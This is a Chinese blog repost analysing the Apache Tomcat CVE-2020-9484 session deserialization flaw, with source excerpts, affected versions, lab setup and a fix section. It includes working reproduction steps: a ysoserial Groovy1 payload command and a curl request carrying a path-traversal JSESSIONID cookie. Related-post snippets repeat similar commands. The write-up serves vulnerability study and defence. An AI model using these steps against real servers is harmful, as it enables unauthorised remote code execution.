java反序列化漏洞 tomcat_CVE-2020-9484 Apache Tomcat反序列化漏洞浅析

最新推荐文章于 2024-04-12 09:50:46 发布
最新推荐文章于 2024-04-12 09:50:46 发布
阅读量301 收藏
点赞数
文章标签: java反序列化漏洞 tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39760919/article/details/114246565
版权

97cb61659bedb6ec4c65696297fcc4e7.png

本文是i春秋论坛作家「Ybwh」表哥原创的一篇技术文章,浅析CVE-2020-9484 Apache Tomcat反序列化漏洞。

56f75fe1b110419e970756baea7d37ca.gif

01漏洞概述

这次是因为错误配置和org.apache.catalina.session.FileStore的LFI和反序列化漏洞引起的RCE。当配置了org.apache.catalina.session.PersistentManager并且使用org.apache.catalina.session.FileStore来储存session时, 用户可以通过org.apache.catalina.session.FileStore的一个LFI漏洞来读取服务器上任意以 .session结尾的文件,然后通过反序列化来运行.session文件。

默认情况是使用org.apache.catalina.session.StandardManager, 将session储存到内存,而PersistentManager会将不常用的session swap out,从而减少内存占用。

此处使用Tomcat 10.0.0-M4来做分析,这里主要是FileStore的LFI漏洞可以反序列化任意路径上的.session 文件,如果同时存在文件上传漏洞的话就是RCE了。

首先看FileStore源码,当用户请求里带有JSESSIONID时,会运行存在问题的load方法:

public Session load(String id) throws ClassNotFoundException, IOException { // Open an input stream to the specified pathname, if any File file = file(id); if (file== null || !file.exists()) { return null; } Context context = getManager().getContext(); Log contextLog = context.getLogger(); if (contextLog.isDebugEnabled()){ contextLog.debug(sm.getString(getStoreName()+".loading", id,file.getAbsolutePath())); } ClassLoader oldThreadContextCL = context.bind(Globals.IS_SECURITY_ENABLED, null); try (FileInputStreamfis = new FileInputStream(file.getAbsolutePath()); ObjectInputStream ois = getObjectInputStream(fis)) { StandardSession session = (StandardSession) manager.createEmptySession(); session.readObjectData(ois); session.setManager(manager); return session; } catch (FileNotFoundExceptione) { if (contextLog.isDebugEnabled()){ contextLog.debug("No persisted data file found"); } return null; } finally { context.unbind(Globals.IS_SECURITY_ENABLED,oldThreadContextCL); } }

load会先将session id转换成file object查看文件是否存在,如果存在的话会读取文件. file object会为输入的id添加.session后缀,然而并没有验证文件的目录:

private File file(String id) throws IOException{ if (this.directory == null) { return null; } String filename= id + FILE_EXT; File file = new File(directory(), filename); return file; }

org.apache.catalina.session.getObjectInputStream,方法:

protected ObjectInputStream getObjectInputStream(InputStream is) throws IOException{ BufferedInputStream bis = new BufferedInputStream(is); CustomObjectInputStream ois; ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); if (managerinstanceof ManagerBase) { ManagerBase managerBase = (ManagerBase) manager; ois = new CustomObjectInputStream(bis, classLoader, manager.getContext().getLogger(), managerBase.getSessionAttributeValueClassNamePattern(), managerBase.getWarnOnSessionAttributeFilterFailure()); } else { ois = new CustomObjectInputStream(bis, classLoader); } return ois; }

getObjectInputStream方法运行

org.apache.catalina.util.CustomObjectInputStream,获取gadget类,然后就反序列化session文件了。

02影响版本

Apache Tomcat:10.0.0-M1 to 10.0.0-M4,9.0.0.M1 to 9.0.34,8.5.0 to 8.5.54 and 7.0.0 to7.0.103

03环境搭建

本次使用linux进行测试,设置一个Tomcat服务:

1、下载Tomcat 10.0.0-M4;

2、将文件解压之后放入/usr/local/tomcat;

3、修改/usr/local/tomcat/conf/context.xlm,添加Manager;

WEB-INF/web.xmlWEB-INF/tomcat-web.xml${catalina.base}/conf/web.xml

directory设置成什么都没有关系,因为不过滤 ../

4、下载groovy-2.3.9.jar;

5、将groovy-2.3.9.jar 放入 /usr/local/tomcat/lib;

6、执行/usr/local/tomcat/bin/catalina.shstart,运行Tomcat。

17f48241604b34902395dfe602e5f03f.png

04漏洞复现

目标是在服务器上执行touch /tmp/2333,假设.session文件已经被上传到服务器的已知位置。

1、下载ysoserial一个生成java反序列化payload的.jar 包;

2、执行java-jarysoserial-master-30099844c6-1.jar Groovy1 "touch /tmp/2333" >/tmp/test.session 生成payload;

f0753858d064626c911d753ddceb82d0.png

3、执行

curl'http://127.0.0.1:8080/index.jsp'-H'Cookie:JSESSIONID=../../../../../tmp/test'

61be98eff754055bc485c890088708d4.png

虽然有报错但是反序列化已经执行了

4、执行ls /tmp查看结果:

953b65fefc26d5191f16069fa25f81d5.png

05修复方式

对比Tomcat 10.0.0-M4和Tomcat 10.0.0-M5的FileStore,源码可以发现做了目录验证。

75e14eb4d10e22ee77a044888e749b1d.png

修复方式就是升级,或者配置WAF,过滤掉../之类的字符串,或者不使用FileStore。

以上是今天要分享的内容,大家看懂了吗?

weixin_39760919
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-9484
04-13
CVE-2020-9484Tomcat) 仅用于教育目的。 有关详细信息,请参见参考。 跑步 $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy 开发 $ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' 查看 $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce
Apache #Tomcat CVE-2020-9484
qq_36584013的博客
06-22 904
CVE-2020-9484 用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞 CVE-2020-9484 环境: Kali 2.0 apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp是s2-053,在其lib下加了commons-collections4-4.0.jar) 启动 /yourtomcat...
Tomcat反序列化漏洞
flyingzc的博客
07-19 1307
Tomcat反序列化漏洞 CVE-2020-9484 漏洞简介 当使用tomcat时,如果使用了tomcat提供的session持久化功能,如果存在文件上传功能,恶意请求者通过一个流程,将能发起一个恶意请求造成服务端远程命令执行。 影响版本 <= 9.0.34 <= 8.5.54 <= 7.0.103 漏洞分析 配置的className=“org.apache.catalina.session.FileStore” 查看FileStore的load方法,代码如下 public Sessio
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
最新发布
weixin_56306210的博客
04-12 965
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
Tomcat Session 反序列化CVE-2020-9484
黑白的博客
11-22 941
声明 好好学习,天天向上 漏洞描述 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 由于错误配置和 org.apache.catalina.session.FileStore 的 LFI 和反序列化漏洞引起的 RCE。 当配置了 org.apache.catalina.session.PersistentManager 并且使用 org.apache.catalina.session.FileStore 来储存 session 时
tomcat源码分析_CVE-2020-9484 tomcat session反序列化漏洞分析
weixin_39839162的博客
11-27 210
作者:N1gh5合天智汇title: CVE-2020-9484 tomcat session反序列化漏洞分析 tags: CVE,Tomcat,反序列化 grammar_cjkRuby: true本文借助CVE-2020-9484 Tomcat漏洞详细的介绍了本地和远程调试Tomcat 源码。分析漏洞成因以及补丁修补情况,以及分析ysoserial反序列化链。0x01 漏洞简介Apache To...
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞通告
爱国小白帽
05-22 3471
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞背景 2020年05月21日, 360CERT监测发现 Apache 官方发布了 Apache Tomcat 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9484,官方对该漏洞评级:高危。 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java
CVE-2020-9484 Apache Tomcat Remote Code Execution via session persistence
lefooter的博客
05-21 1596
版权声明:本文为CSDN博主「隐形人真忙」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u011721501/article/details/88637270 近楼主也没有其他的时间来做漏洞研究了,读者们可以从本博上次更新的时间就可以看出来=_,=。 但是为了一直关注本楼主的朋友们,我决定拿出两年前的一个存货(其实是辣鸡洞)分享,诚意满满(大雾)。 以下是正文: ————————————————————.
CVE-2020-9484 (Tomcat cluster sync-session)复现
thelostworld
08-20 1330
CVE-2020-9484 一、漏洞简介 对于一个企业级应用而言,Session对象的管理十分重要。Sessio对象的信息一般情况下置于服务器的内存中,当服务器由于故障重启,或应用重新加载 时候,此时的Session信息将全部丢失。为了避免这样的情况,在某些场合可以将服务器的Session数据存放在文件系统或数据库中,这样的操作称为 Session对象的持久化。Session对象在持久化时,存放在其中的对象以序列化的形式存放,这就是为什么一般存放在Session中的数据需要实 现可序...
CVE-2020-9484 Tomcat Session 反序列化复现
weixin_45260839的博客
07-01 1737
CVE-2020-9484 Tomcat Session 反序列化复现
Tomcat Session(CVE-2020-9484)反序列化漏洞复现
yzl_007的博客
08-28 1693
Tomcat Session(CVE-2020-9484)反序列化漏洞复现 漏洞概述 Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。 成功利用此漏洞需要同时满足以下4个条件: 1.攻击者能够控制服务器上文件的内容和文件名称; 2.服务器PersistenceManager配置中使用了FileStore; 3.PersistenceManager中的sessionAttributeValueClassNameFilter被配置为“null”,或者过滤器不够
http路径转file会变成反斜杠_CVE-2020-9484 Apache Tomcat反序列化漏洞浅析
weixin_39968995的博客
11-28 167
本文是i春秋论坛作家「Ybwh」表哥原创的一篇技术文章,浅析CVE-2020-9484 Apache Tomcat反序列化漏洞。01漏洞概述这次是因为错误配置和org.apache.catalina.session.FileStore的LFI和反序列化漏洞引起的RCE。当配置了org.apache.catalina.session.PersistentManager并且使用org.apache.c...
CVE-2020-9484Tomcat Session 反序列化漏洞复现分析
"CVE-2020-9484是一个关于Apache Tomcat Web服务器的漏洞,主要涉及Session反序列化和本地文件包含(LFI)问题,可能导致远程代码执行(RCE)。此漏洞影响多个Tomcat版本,包括10.0.0-M1至10.0.0-M4,9.0.0.M1至9.0....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值